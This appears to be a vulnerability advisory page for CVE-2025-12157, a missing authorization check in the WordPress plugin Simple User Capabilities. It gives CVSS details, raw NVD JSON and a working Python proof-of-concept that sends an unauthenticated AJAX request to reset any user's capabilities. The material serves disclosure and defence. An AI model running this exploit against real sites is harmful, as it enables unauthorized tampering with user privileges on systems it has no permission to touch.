Security Vulnerability Report
CVE-2025-12157 CVSS 5.3 MEDIUM

CVE-2025-12157

Published: 2025-11-04 05:16:09
Last Modified: 2026-04-15 00:35:42

Description

The Simple User Capabilities plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wp_ajax_nopriv_reset_capability' AJAX endpoint in all versions up to, and including, 1.0. This makes it possible for unauthenticated attackers to reset any user's capabilities.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Simple User Capabilities plugin <= 1.0 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-12157 PoC
# Simple User Capabilities Plugin <= 1.0 - Unauthenticated Capability Reset

target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target-wordpress-site.com'
target_user_id = sys.argv[2] if len(sys.argv) > 2 else '1'

# AJAX endpoint URL
ajax_url = f"{target_url}/wp-admin/admin-ajax.php"

# Payload for reset_capability action
data = {
    'action': 'reset_capability',
    'user_id': target_user_id
}

print(f"[*] Sending request to {ajax_url}")
print(f"[*] Targeting user ID: {target_user_id}")

try:
    response = requests.post(ajax_url, data=data, timeout=10)

    if response.status_code == 200:
        print("[+] Request sent successfully")
        print(f"[*] Response status: {response.status_code}")
        print(f"[*] Response content: {response.text[:500]}")
    else:
        print(f"[!] Request failed with status: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[!] Error: {e}")

# Note: This PoC demonstrates the vulnerability exists
# Successful exploitation requires the target to have the vulnerable plugin installed

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12157", "sourceIdentifier": "[email protected]", "published": "2025-11-04T05:16:09.357", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Simple User Capabilities plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wp_ajax_nopriv_reset_capability' AJAX endpoint in all versions up to, and including, 1.0. This makes it possible for unauthenticated attackers to reset any user's capabilities."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.svn.wordpress.org/simple-user-capabilities/tags/1.0/user_access.php", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/simple-user-capabilities/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3a1d0432-aff0-477e-aa6e-4de3e4d789cb?source=cve", "source": "[email protected]"}]}}